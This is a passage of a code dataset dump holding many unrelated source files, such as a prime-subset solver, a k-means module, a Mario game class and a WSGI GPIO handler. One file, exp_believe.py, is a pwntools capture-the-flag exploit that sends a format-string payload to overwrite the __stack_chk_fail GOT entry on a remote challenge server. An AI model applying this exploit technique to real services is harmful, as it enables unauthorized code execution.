numbers\nprimes = []\nnot_primes = []\nfor i in range(2, m):\n if is_prime(i):\n primes.append(i)\n else:\n not_primes.append(i)\nprint(primes)\nnum_primes = len(primes)\nprint(\"there are\",num_primes,\"primes\")\n\n# start by adding 1 to each set\n\ncounter = 0\n\n# FIXME: it's just broken lol\n# if task == \"4\":\n# subsets.append([1,2,61,67,71,73,79,83,89])\n# subsets.append([1,3,13,17,29,31,41,47,59])\n# subsets.append([1,5,7 ,11,19,23,37,43,53]) #41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89\n# counter = 8\n# elif task == \"5\":\n# subsets.append([1,2,101,103,107,109,113,127,131])\n# subsets.append([1,3,47 ,53 ,59 ,61 ,67 ,79 ,89])\n# subsets.append([1,5,29 ,31 ,37 ,41 ,23 ,71 ,83])\n# subsets.append([1,7,11 ,13 ,17 ,19 ,43 ,73 ,97]) #97, 101, 103, 107, 109, 113, 127, 131\n# counter = 8\n# elif task == \"1\" or task == \"2\" or task == \"3\":\n# # subsets.append([1,2,19,13,17])\n# # subsets.append([1,3,5 ,7 ,11])\n# # subsets.append([1,2,3,73,79,83,89,97,101,103,107,109,113,127,131,133,137,139,149])\n# # subsets.append([1,5,7,11,13,17,19,23,29 ,31 ,37 ,41 ,43 ,47 ,53 ,59 ,61 ,67 ,71])\n# subsets.append([1,2,5])\n# subsets.append([1,3,7])\n# start = 12 #task 2: 35\n# subsets[0] = subsets[0] + primes[4+start:4+2*start]\n# subsets[1] = subsets[1] + primes[4:4+start]\n# #print(len(subsets[0]), (len(subsets[1])))\n# counter = len(subsets[0]) - 1\n\n# for i in range(n):\n# subsets.append([1])\n# subsets.append([1,2,5,7,11,13,17,19]) \n# subsets.append([1,3,23,29,31,37,41,43,47,53]) \n# subsets.append([1,2,5,7,11,13]) \n# subsets.append([1,3,17,19,23,29,31,37,41,43,47,53]) \n\nif task == \"1\":\n subsets.append([1,2, 53,59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397]) \n subsets.append([1,3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47])\nif task == \"2\":\n start = 38\n subsets.append([1,2] + primes[start:])\n subsets.append([1] + primes[1:start])\nif task == \"3\":\n start = 83\n subsets.append([1,2] + primes[start:])\n subsets.append([1] + primes[1:start])\nif task == \"4\":\n pre = 3\n start = 211\n pre_start = 26\n subsets.append([1,2] + primes[start:])\n subsets.append([1,3] + primes[pre_start:start])\n subsets.append([1,5] + primes[pre:pre_start])\nif task == \"5\":\n pre = 4\n pre_start = 15\n pre_start2 = 53\n start = 105\n \n subsets.append([1,2] + primes[start:])\n subsets.append([1,3] + primes[pre_start2:start])\n subsets.append([1,5] + primes[pre_start:pre_start2])\n subsets.append([1,7] + primes[pre:pre_start])\n # del primes[0]\n # step = 2\n # counter = 0\n # while (counter + 1) * (step) <= start:\n # j = 0\n # # alternate the direction we add the numbers\n # if counter % 4 == 0 or counter % 4 == 3:\n # r = range(1,3)\n # else:\n # r = range(2, 0, -1)\n # for i in r:\n # # print(counter * step + j)\n # subsets[i].append(primes[counter * step + j])\n # j += 1\n # counter += 1\n\n#primes = sorted(primes, reverse=True)\n\n# add prime numbers intelligently\n# p_i = 16\n# while p_i < len(primes) - 0:\n# p = primes[p_i]\n# #print(\"old\")\n# composites = []\n# for s in subsets:\n# current_composites = 0\n# for c in not_primes:\n# factors = f(c)\n# unique = True\n# located = False\n# first = factors[0]\n# if first in s:\n# located = s\n# else:\n# continue\n# #print(first,located)\n# for k in range(1,len(factors)):\n# if not factors[k] in s:\n# #print(k,\"not in\",located)\n# unique = False\n# break\n# if unique:\n# current_composites += 1\n# #print(c)\n# composites.append(len(s) + current_composites)\n# #print(\"new\")\n# new_composites = []\n# for s_i in range(len(subsets)):\n# subsets[s_i].append(p)\n# #print(s_i,p)\n# current_composites = 0\n# for c in not_primes:\n# factors = f(c)\n# unique = True\n# first = factors[0]\n# if not first in subsets[s_i]:\n# continue\n# #print(first,located)\n# for k in range(1,len(factors)):\n# if not factors[k] in subsets[s_i]:\n# #print(k,\"not in\",located)\n# unique = False\n# break\n# if unique:\n# current_composites += 1\n# #print(c)\n# #print(current_composites)\n# new_composites.append(len(subsets[s_i]) + current_composites)\n# del subsets[s_i][-1]\n \n# # for task 1,2,3 only for now\n# # if p_i < 5:\n# # if (abs(composites[0] - new_composites[1]) > abs(composites[1] - new_composites[0])):\n# # subsets[1].append(p)\n# # else:\n# # subsets[0].append(p)\n# if (abs(composites[0] - new_composites[1]) < abs(composites[1] - new_composites[0])):\n# subsets[1].append(p)\n# else:\n# subsets[0].append(p)\n# print(p,composites,new_composites)\n# p_i += 1\n # p_i += 2\n # if p_i >= len(primes):\n # if p_i % 2 == 0:\n # p_i = 1\n # else:\n # break\n\n\n# add prime numbers\n# step = n\n# while (counter + 1) * (step) <= num_primes:\n# j = 0\n# # alternate the direction we add the numbers\n# if counter == 0 or ((task == \"1\" or task == \"2\" or task == \"3\") and (counter % 4 == 0 or counter % 4 == 3)):\n# r = range(len(subsets))\n# else:\n# r = range(len(subsets) - 1, -1, -1)\n# for i in r:\n# # print(counter * step + j)\n# subsets[i].append(primes[counter * step + j])\n# j += 1\n# counter += 1\n\nfor i in subsets:\n print(\"len\",len(i))\n\nleftovers = []\n\n# add composite numbers to subsets\nfor i in not_primes:\n factors = f(i)\n unique = True\n located = []\n first = factors[0]\n for j in range(len(subsets)):\n if first in subsets[j]:\n located = j\n #print(first,located)\n for k in range(1,len(factors)):\n if not factors[k] in subsets[located]:\n #print(k,\"not in\",located)\n unique = False\n leftovers.append(i)\n break\n if unique:\n subsets[located].append(i)\n #print(\"unique\")\n\n#print(leftovers)\n\n# def get_products(subs):\n# if len(subs) == 2:\n# products = []\n# for i in subs[0]:\n# for j in subs[1]:\n# products.append(i * j)\n# return products\n# else:\n# prev_products = get_products(subs[1:])\n# new_products = []\n# for i in subs[0]:\n# for j in prev_products:\n# new_products.append(i * j)\n# return new_products\n\n\n# for i in leftovers:\n# for sub_i in range(len(subsets)):\n# subsets[sub_i].append(i)\n# p = get_products(subsets)\n# p_set = set(p)\n# if len(p) != len(p_set):\n# del subsets[sub_i][-1] # contains duplicates\n# print(i,\"contains duplicates\")\n\nmin_len = m\ntotal_len = 0\nfor i in subsets:\n print(\"len\",len(i))\n total_len += len(i)\n if len(i) < min_len:\n min_len = len(i)\nprint(total_len)\n\nfor i in range(len(subsets)):\n subsets[i] = subsets[i][:min_len]\n\n# print()\n# assert len({len(i) for i in subsets}) == 1, \"Subsets are not of equal size\"\n\n#delete the last number in the output\n\n# change to whatever you want your output file to be called\nout = open('output'+ task + '.txt', 'w')\nfor s in subsets:\n for i in range(len(s)):\n out.write(str(s[i])+\" \")\n out.write(\"\\n\")\nout.close()","sub_path":"cmimcoptimization1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515423990","text":"import os\nimport math\n\n\ncellSize = {\n\t0: \"Minuscule\",\n\t1: \"Tiny\",\n\t2: \"Small\",\n\t3: \"Medium\",\n\t4: \"Big\",\n\t5: \"Huge\",\n\t6: \"Gigantic\",\n\t7: \"Colossal\"\n}\n\nfor filename in os.listdir(\".\"):\n\tif filename.startswith(\"CancerCellsGreyedOut_\"):\n\t\tcellNum = int(filename[33:-4])\n\t\tos.rename(filename, \"Grey \" + cellSize[cellNum] + \" Cell.png\")","sub_path":"assets/RenameSprites.py","file_name":"RenameSprites.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"353946746","text":"import requests as request\n\nclass jsonSchemaTest():\n def apiTest(self):\n response = request.get(\"http://json-schema.org/draft-04/schema#\")\n #print(response.status_code)\n jsonData = response.json()\n #print(jsonData)\n for key, value in jsonData.items():\n if key == \"dependencies\":\n print(value)\n\n\nobj = jsonSchemaTest()\nobj.apiTest()","sub_path":"JsonSchemaOrg.py","file_name":"JsonSchemaOrg.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"582775721","text":"# Set() function returns a set of all the unique characters.\n# So just compare the length of the String with the length of the Set \n\ns1=\"unique\"\ns2=\"bear\"\n\n\ndef _isUnique(s):\n if(len(s)==len(set(s))):\n return \"YES\"\n else:\n return \"NO\"\nprint (_isUnique(s2))\n","sub_path":"pythonSolutions/arraysAndStrings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"92139137","text":"def application(environ, start_response):\n\n import cgi\n import json\n\n import os,sys,inspect\n\n # Set top folder to allow import of modules\n\n top_folder = os.path.split(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0])))[0]\n if top_folder not in sys.path:\n sys.path.insert(0,top_folder)\n\n from cupid.pilib import sqlitedatadump\n\n post_env = environ.copy()\n post_env['QUERY_STRING'] = ''\n post = cgi.FieldStorage(\n fp=environ['wsgi.input'],\n environ=post_env,\n keep_blank_values=True\n )\n\n formname=post.getvalue('name')\n data={}\n d = {}\n for k in post.keys():\n d[k] = post.getvalue(k)\n\n status = '200 OK'\n\n # Get GPIO status\n # We return this status no matter what\n\n gpiolist = [18,23,24,25,4,17,21,22]\n import cupid.pilib as pilib\n inputs = pilib.readalldbrows(pilib.controldatabase, 'inputs')\n interfaces = pilib.readalldbrows(pilib.controldatabase, 'interfaces')\n\n statusdict={}\n for input in inputs:\n statusdict[input['id'] + 'value'] = input['value']\n for interface in interfaces:\n if interface['type'] == 'GPIO':\n options = pilib.parseoptions(interface['options'])\n statusdict[interface['id'] + 'mode'] = options['mode']\n\n # Execute commands\n if 'action' in d:\n querylist=[]\n if d['action'] == 'toggleGPIOmode':\n pass\n elif d['action'] == 'toggleGPIOvalue':\n outputs = pilib.readalldbrows(pilib.controldatabase,'outputs')\n for output in outputs:\n if output['id'] == d['GPIOid']:\n curval = output['value']\n if curval == 0:\n setval = 1\n else:\n setval = 0\n querylist.append('update outputs set value= ' + str(setval) + ' where id=\\'' + d['GPIOid'] + '\\'')\n pilib.sqlitemultquery(pilib.controldatabase,querylist)\n\n # Refresh everything\n inputs = pilib.readalldbrows(pilib.controldatabase, 'inputs')\n interfaces = pilib.readalldbrows(pilib.controldatabase, 'interfaces')\n\n statusdict={}\n for input in inputs:\n statusdict[input['id'] + 'value'] = input['value']\n for interface in interfaces:\n if interface['type'] == 'GPIO':\n options = pilib.parseoptions(interface['options'])\n statusdict[interface['id'] + 'mode'] = options['mode']\n\n output = json.dumps(statusdict, indent=1)\n\n response_headers = [('Content-type', 'application/json')]\n start_response(status,response_headers)\n\n return [output]\n\n","sub_path":"wsgi/wsgigpioactions.wsgi","file_name":"wsgigpioactions.wsgi","file_ext":"wsgi","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"596846921","text":"from matplotlib import pyplot as plt\nfrom numpy import linspace\n\nmonitor_fps = 30\ndef test(fps):\n x = (monitor_fps/fps) % 1.0\n return (x+0.5) % 1.0 - 0.5\n\nX = [x for x in range(1, 1000)]\nY = [test(x) for x in X]\n\nplt.title(f'{monitor_fps}Hz monitor')\nplt.xlabel('fps')\nplt.ylabel('VSync drift / frame')\nplt.yticks([-0.5, -0.25, 0, 0.25, 0.5])\n\nplt.scatter(X, Y)\nplt.plot(X, Y)\nplt.show()","sub_path":"fps.py","file_name":"fps.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"540613349","text":"import re\n\ndef isLeapYear(year):\n status= False\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n status= True\n else:\n status= True\n return status\n\n# Test Leap Year\n# years=[2000, 1992, 1994, 1600, 1900]\n# for year in years:\n# print('{} : {}'.format(year, (True if isLeapYear(year) else False)))\n\ndef validasiTanggalLahir(arr):\n hasil={\n 'valid': [],\n 'invalid': []\n }\n\n date_pattern='^(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])$'\n\n for profil in arr:\n separator='-'\n if '/' in profil['tgl_lahir']:\n separator='/'\n elif ' ' in profil['tgl_lahir']:\n separator= ' '\n elif '.' in profil['tgl_lahir']:\n separator= '.'\n else:\n pass\n\n parts= profil['tgl_lahir'].split(separator)\n tahun= int(parts[0])\n bulan= int(parts[1])\n hari= int(parts[2])\n\n profil['alasan']=[]\n bulan_31_hari=[1,3,5,7,8,10,12]\n error=0\n\n if re.match(date_pattern, profil['tgl_lahir']) == False:\n error += 1\n\n # cek tahun\n if tahun < 1900 or tahun > 2099:\n profil['alasan'].append('tahun di luar batas yang ditentukan')\n error+= 1\n\n # cek bulan\n if bulan > 12:\n profil['alasan'].append('bulan di luar batas yang ditentukan')\n error+= 1\n\n # cek hari pada bulan \"februari\" dan tahun kabisat\n if bulan == 2 and isLeapYear(tahun) == False and hari > 28:\n profil['alasan']=['penunjuk hari dalam bulan terkait tidak valid (cek aturan tahun kabisat)']\n error+=1\n\n # cek hari selain bulan \"februari\"\n if bulan != 2 and bulan <= 12:\n # cek bulan yang tidak boleh lebih dari 30 hari\n if hari > 31:\n profil['alasan'].append('hari di luar batas yang ditentukan')\n error+=1\n else:\n if hari > 30 and bulan not in bulan_31_hari:\n profil['alasan'].append('hari di luar batas yang ditentukan')\n error+=1\n\n # kategorikan hasil\n if error == 0:\n hasil['valid'].append(profil)\n else:\n hasil['invalid'].append(profil)\n \n return hasil\n\n# Driver Code\nprint(validasiTanggalLahir([\n {'nama':'Jane Doe', 'tgl_lahir': '1992-10-31'},\n {'nama':'Jack Doe', 'tgl_lahir': '1997-02-29'},\n {'nama':'Donny Doe', 'tgl_lahir': '1988-12-01'}\n])) \n\n'''\n{\n 'valid': [\n {'alasan': [], 'tgl_lahir': '1992-10-31', 'nama': 'Jane Doe'}, \n {'alasan': [], 'tgl_lahir': '1988-12-01', 'nama': 'Donny Doe'}\n ], \n 'invalid': [\n {'alasan': ['penunjuk hari dalam bulan terkait tidak valid (cek aturan tahun kabisat)'], 'tgl_lahir': '1997-02-29', 'nama': 'Jack Doe'}\n ]\n} \n'''\n\nprint(validasiTanggalLahir([\n {'nama':'Bayu Aji', 'tgl_lahir': '1983-04-31'},\n {'nama':'Tia Nugroho', 'tgl_lahir': '1984-08-29'},\n {'nama':'Ariel Bayu', 'tgl_lahir': '1988-07-32'}\n]))\n\n'''\n{\n 'valid': [\n {'nama': 'Tia Nugroho', 'alasan': [], 'tgl_lahir': '1984-08-29'}\n ], \n 'invalid': [\n {'nama': 'Bayu Aji', 'alasan': ['hari di luar batas yang ditentukan'], 'tgl_lahir': '1983-04-31'}, \n {'nama': 'Ariel Bayu', 'alasan': ['hari di luar batas yang ditentukan'], 'tgl_lahir': '1988-07-32'}\n ]\n} \n'''\n\nprint(validasiTanggalLahir([\n {'nama':'Tulus Saputra', 'tgl_lahir': '2100-05-31'},\n {'nama':'Sumitro Doe', 'tgl_lahir': '2002-13-31'},\n {'nama':'Juni Talira', 'tgl_lahir': '2001-09-12'}\n])) \n\n'''\n{\n 'invalid': [\n {'tgl_lahir': '2100-05-31', 'nama': 'Tulus Saputra', 'alasan': ['tahun di luar batas yang ditentukan']},\n {'tgl_lahir': '2002-13-31', 'nama': 'Sumitro Doe', 'alasan': ['bulan di luar batas yang ditentukan']}\n ], \n 'valid': [\n {'tgl_lahir': '2001-09-12', 'nama': 'Juni Talira', 'alasan': []}\n ]\n} \n'''\n","sub_path":"python/10-regex/4-validasi-login-simple.py","file_name":"4-validasi-login-simple.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"466190448","text":"from config import GRID_CONFIG, PLAYER_CONFIG\nimport os\n\n\nclass Person:\n '''Characteristics of a person'''\n\n def __init__(self, name, height, width, speed):\n '''Contructor for person objects'''\n self.name = name\n self.height = height\n self.width = width\n self.speed = speed\n self.pos = {'x': 0, 'y': (GRID_CONFIG['HEIGHT'] - 1)}\n self.gravity = True\n self.surface = GRID_CONFIG['HEIGHT'] - 1\n self.base = GRID_CONFIG['ACTUAL_HEIGHT'] - 1\n self.max_jump = self.height * 2\n self.jump_from = self.base\n\n def move(self):\n '''Function to be over ridden by child classes'''\n pass\n\n def createMe(self, scene=None, code=None):\n '''Function to create the Player o the board'''\n if scene is None:\n return\n if code is None:\n return\n for i in range(self.pos['y'], self.pos['y'] - self.height, -1):\n for j in range(self.width):\n scene._grid[i][self.pos['x']+j] = code\n\n def clearMe(self, scene=None):\n '''Function to clear the Player o the board'''\n if scene is None:\n return\n for i in range(self.pos['y'], self.pos['y'] - self.height, -1):\n for j in range(self.width):\n scene._grid[i][self.pos['x']+j] = GRID_CONFIG['CODE']['BLANK']\n\n def showMe(self, action=None, scene=None):\n '''Function to show the player on the grid when scene map is rendered'''\n if scene is not None:\n self.clearMe(scene=scene)\n if action is not None:\n self.move(action=action, scene=scene)\n else:\n self.move(scene=scene)\n self.createMe(scene=scene)\n\n def check_surround(self, scene=None, pos=None):\n '''Check for ragging'''\n for i in range(pos['y'], pos['y'] - self.height, -1):\n for j in range(self.width):\n if (scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['BLANK'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['CLOUD'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['EXIT'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['GRASS'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['COIN']) or scene._grid[i][pos['x']+j] == GRID_CONFIG['CODE']['PLAYER']:\n self.check_clash(scene=scene, y=i, x=pos['x']+j, pos=pos)\n return False\n if self.name == 'Mario' and scene._grid[i][pos['x']+j] == GRID_CONFIG['CODE']['COIN']:\n for coin in scene.coins:\n if coin.x == (pos['x'] + j) and coin.y == i:\n coin.collected(scene=scene)\n scene.coins.remove(coin)\n os.system(\"aplay -q Sounds/coin.wav &\")\n # scene.numCoins -= 1\n self.score += 1000\n\n return True\n\n def check_clash(self, scene=None, y=None, x=None, pos=None):\n '''Check for clashes between player and other entities'''\n if self.pos['y'] == pos['y']:\n if self.name == 'Mario':\n if scene._grid[y][x] == GRID_CONFIG['CODE']['ENEMY']:\n PLAYER_CONFIG['LIVES_LOST'] += 1\n\n # Sound for losing a life\n os.system(\"aplay -q Sounds/bump.wav &\")\n\n elif self.name == 'Enemy':\n if scene._grid[y][x] == GRID_CONFIG['CODE']['PLAYER']:\n PLAYER_CONFIG['LIVES_LOST'] += 1\n os.system(\"aplay -q Sounds/bump.wav &\")\n elif self.pos['y'] != pos['y']:\n if self.name == 'Mario':\n for i in range(scene.numEnemies):\n for j in range(x, x + PLAYER_CONFIG['SIZE'], 1):\n if scene.enemies[i].pos['x'] in range(x, x + PLAYER_CONFIG['SIZE'], 1) and (scene._grid[y+1][j] == GRID_CONFIG['CODE']['ENEMY']):\n os.system(\"aplay -q Sounds/kill.wav &\")\n scene.enemies[i].lives -= 1\n self.score += 1000\n break\n if scene.enemies[i].lives == 0:\n break\n","sub_path":"person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"53193447","text":"import numpy as np\nimport logging\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\nfrom .results import Results\n\nlogger = logging.getLogger(__name__)\n\n\nclass KmeansResults(Results):\n \"\"\"\n Contains results and metadata of a k-means refinement calculation\n \"\"\"\n def reset(self):\n self.k_value = None\n self.var_list = None\n self.cl_mean_centroids = None\n\n\nclass Kmeans(object):\n def __init__(self,\n Z,\n row_clusters,\n col_clusters,\n n_row_clusters,\n n_col_clusters,\n k_range,\n kmean_max_iter=100,\n var_thres=2.,\n output_filename=''):\n \"\"\"\n Set up Kmeans object.\n\n :param Z: m x n matrix of spatial-temporal data. Usually each row is a\n time-series of a spatial grid.\n :type Z: class:`numpy.ndarray`\n :param row_clusters: m x 1 row cluster array.\n :type row_clusters: class:`numpy.ndarray`\n :param col_clusters: n x 1 column cluster array.\n :type col_clusters: class:`numpy.ndarray`\n :param n_row_clusters: number of row clusters\n :type n_row_clusters: int\n :param n_col_clusters: number of column clusters\n :type n_col_clusters: int\n :param k_range: range of the number of clusters, i.e. value \"k\"\n :type k_range: range\n :param kmean_max_iter: maximum number of iterations of the KMeans\n :type kmean_max_iter: int\n :param var_thres: threshold of the sum of variance to select k\n :type var_thres: float\n :param output_filename: name of the file where to write the results\n :type output_filename: str\n \"\"\"\n # Input parameters -----------------\n self.row_clusters = row_clusters\n self.col_clusters = col_clusters\n self.n_row_clusters = n_row_clusters\n self.n_col_clusters = n_col_clusters\n self.k_range = list(k_range)\n self.kmean_max_iter = kmean_max_iter\n self.var_thres = var_thres\n self.output_filename = output_filename\n # Input parameters end -------------\n\n # store input parameters in results object\n self.results = KmeansResults(**self.__dict__)\n\n self.Z = Z\n\n if len(np.unique(row_clusters)) > n_row_clusters:\n print('Setting \"n_row_clusters\" to {}, \\\n accoding to the number of unique elements in \"row_clusters\".'.\n format(len(np.unique(row_clusters))))\n self.n_row_clusters = len(np.unique(row_clusters))\n\n if len(np.unique(col_clusters)) > n_col_clusters:\n print('Setting \"col_clusters\" to {}, \\\n accoding to the number of unique elements in \"col_clusters\".'.\n format(len(np.unique(col_clusters))))\n self.n_col_clusters = len(np.unique(col_clusters))\n\n def compute(self):\n \"\"\"\n Compute statistics for each clustering group.\n Then Loop through the range of k values,\n and compute the sum of variances of each k.\n Finally select the smallest k which gives\n the sum of variances smaller than the threshold.\n\n :return: k-means result object\n \"\"\"\n # Get statistic measures\n self._compute_statistic_measures()\n\n # Search for value k\n var_list = np.array([]) # List of variance of each k value\n kmeans_cc_list = []\n for k in self.k_range:\n # Compute Kmean\n kmeans_cc = KMeans(n_clusters=k, max_iter=self.kmean_max_iter).fit(\n self.stat_measures_norm)\n var_list = np.hstack((var_list, self._compute_sum_var(kmeans_cc)))\n kmeans_cc_list.append(kmeans_cc)\n idx_k = min(np.where(var_list < self.var_thres)[0])\n self.results.var_list = var_list\n self.results.k_value = self.k_range[idx_k]\n self.kmeans_cc = kmeans_cc_list[idx_k]\n del kmeans_cc_list\n\n # Scale back centroids of the \"mean\" dimension\n centroids_norm = self.kmeans_cc.cluster_centers_[:, 0]\n stat_max = np.nanmax(self.stat_measures[:, 0])\n stat_min = np.nanmin(self.stat_measures[:, 0])\n mean_centroids = centroids_norm * (stat_max - stat_min) + stat_min\n\n # Assign centroids to each cluster cell\n cl_mean_centroids = mean_centroids[self.kmeans_cc.labels_]\n\n # Reshape the centroids of means to the shape of cluster matrix,\n # taking into account non-constructive row/col cluster\n self.results.cl_mean_centroids = np.full(\n (self.n_row_clusters, self.n_col_clusters), np.nan)\n idx = 0\n for r in np.unique(self.row_clusters):\n for c in np.unique(self.col_clusters):\n self.results.cl_mean_centroids[r, c] = cl_mean_centroids[idx]\n idx = idx + 1\n\n self.results.write(filename=self.output_filename)\n return self.results\n\n def _compute_statistic_measures(self):\n \"\"\"\n Compute 6 statistics: Mean, STD, 5 percentile, 95 percentile, maximum\n and minimum values, for each co-cluster group.\n Normalize them to [0, 1]\n \"\"\"\n self.stat_measures = np.empty([0, 6])\n # Loop per co-cluster cell\n for r in np.unique(self.row_clusters):\n for c in np.unique(self.col_clusters):\n idx_rows = np.where(self.row_clusters == r)[0]\n idx_col = np.where(self.col_clusters == c)[0]\n # All elements in Z falling into this cluster cell\n cl_Z = self.Z[idx_rows, :][:, idx_col]\n\n cl_stat = np.array([\n np.nanmean(cl_Z),\n np.nanstd(cl_Z),\n np.nanpercentile(cl_Z, 5),\n np.nanpercentile(cl_Z, 95),\n np.nanmax(cl_Z),\n np.nanmin(cl_Z)\n ])\n\n self.stat_measures = np.vstack((self.stat_measures, cl_stat))\n\n # Normalize all statistic measures to [0, 1]\n self.stat_measures_norm = []\n descale = []\n for sm in self.stat_measures.T:\n minimum = np.nanmin(sm, axis=0)\n maximum = np.nanmax(sm, axis=0)\n sm_norm = np.divide((sm - minimum), (maximum - minimum))\n self.stat_measures_norm.append(sm_norm)\n\n self.stat_measures_norm = np.array(self.stat_measures_norm).T\n\n def _compute_sum_var(self, kmeans_cc):\n \"\"\"\n Compute the sum of squared variance of each Kmean cluster\n \"\"\"\n\n # Compute the sum of variance of all points\n var_sum = np.sum((self.stat_measures_norm -\n kmeans_cc.cluster_centers_[kmeans_cc.labels_])**2)\n\n return var_sum\n\n def plot_elbow_curve(self, output_plot='./kmean_elbow_curve.png'):\n \"\"\"\n Export elbow curve plot\n \"\"\"\n k_range = self.results.input_parameters['k_range']\n var_thres = self.results.input_parameters['var_thres']\n plt.plot(k_range, self.results.var_list) # kmean curve\n plt.plot([min(k_range), max(k_range)],\n [var_thres, var_thres],\n color='r',\n linestyle='--') # Threshold\n plt.plot([self.results.k_value, self.results.k_value],\n [min(self.results.var_list), max(self.results.var_list)],\n color='g',\n linestyle='--') # Selected k\n xtick_step = int((max(k_range) - min(k_range)) / 6)\n ytick_step = int((max(self.results.var_list)\n - min(self.results.var_list)) / 6)\n plt.xticks(range(min(k_range), max(k_range), xtick_step))\n plt.xlim(min(k_range), max(k_range))\n plt.ylim(min(self.results.var_list), max(self.results.var_list))\n plt.text(max(k_range) - 2 * xtick_step,\n var_thres + ytick_step / 4,\n 'threshold={}'.format(var_thres),\n color='r',\n fontsize=12)\n plt.text(self.results.k_value + xtick_step / 4,\n max(self.results.var_list) - ytick_step,\n 'k={}'.format(self.results.k_value),\n color='g',\n fontsize=12)\n plt.xlabel('k value', fontsize=20)\n plt.ylabel('Sum of variance', fontsize=20)\n plt.grid(True)\n plt.savefig(output_plot,\n format='png',\n transparent=True,\n bbox_inches=\"tight\")\n","sub_path":"cgc/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"310378295","text":"from flask import Blueprint,render_template,redirect,url_for,request,flash\nfrom app.models import Post\n\n\n\n\nblog = Blueprint('blog',__name__)\n@blog.route('/post')\ndef post():\n post_id = request.args.get('post_id')\n if post_id:\n post = Post.query.filter_by(id=int(post_id)).first()\n return render_template('blog/post.html',post=post,title='BingYm | '+post.post_title)\n else:\n return redirect(url_for('blog_index',page=1))","sub_path":"vs/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74163287","text":"# coding=utf-8\nimport yaml\n\n\n# 读取不同环境下的相关变量\ndef load_environment():\n with open('params.yaml', encoding='utf-8') as f:\n x = yaml.load(f)\n if x['active'] == 'dev':\n return x['dev']\n elif x['active'] == 'prev':\n return x['prev']\n elif x['active'] == 'prod':\n return x['prod']\n\n\nif __name__ == '__main__':\n res = load_environment()\n print(res)\n print(type(res))\n","sub_path":"Module/code/section_20/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"275343604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \nfrom pwn import *\ncontext.log_level = 'debug'\ncontext.terminal = ['deepin-terminal', '-x', 'sh', '-c']\nlocal =0 \n\n\nif local:\n io = process('./believeMe')\n raw_input(\"debug -> \")\n # gdb.attach(io, 'b * 0x80487cc') \n \nelse:\n io = remote('18.223.228.52', 13337)\n \nelf = ELF('./believeMe')\ntarget = elf.sym['noxFlag']\n# 08 04 86 7b\n# 7b 86 04 08\n# plt seg belongs to code seg, has no right to write\n# fflush_plt = elf.plt['fflush']\n# 0x804 84d0\n# payload = p32(fflush_plt) + '%' + str((target & 0xffff)-4) + 'c%9$hn'\nstack_fail = elf.got['__stack_chk_fail']\ncanary = 0xffffdd0c\npayload = p32(stack_fail) + p32(canary)+ '%' + str((target & 0xffff) - 8) + 'c%9$hn%10$hhn'\n\n\n\n\nio.recvuntil('????')\nio.sendline(payload)\nio.interactive()\nio.close()\n","sub_path":"others/nox-believeMe/exp_believe.py","file_name":"exp_believe.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"424096716","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayCloudCloudbaseFunctionLayerBindModel(object):\n\n def __init__(self):\n self._biz_app_id = None\n self._biz_env_id = None\n self._function_name = None\n self._layer_name = None\n self._layer_version_name = None\n\n @property\n def biz_app_id(self):\n return self._biz_app_id\n\n @biz_app_id.setter\n def biz_app_id(self, value):\n self._biz_app_id = value\n @property\n def biz_env_id(self):\n return self._biz_env_id\n\n @biz_env_id.setter\n def biz_env_id(self, value):\n self._biz_env_id = value\n @property\n def function_name(self):\n return self._function_name\n\n @function_name.setter\n def function_name(self, value):\n self._function_name = value\n @property\n def layer_name(self):\n return self._layer_name\n\n 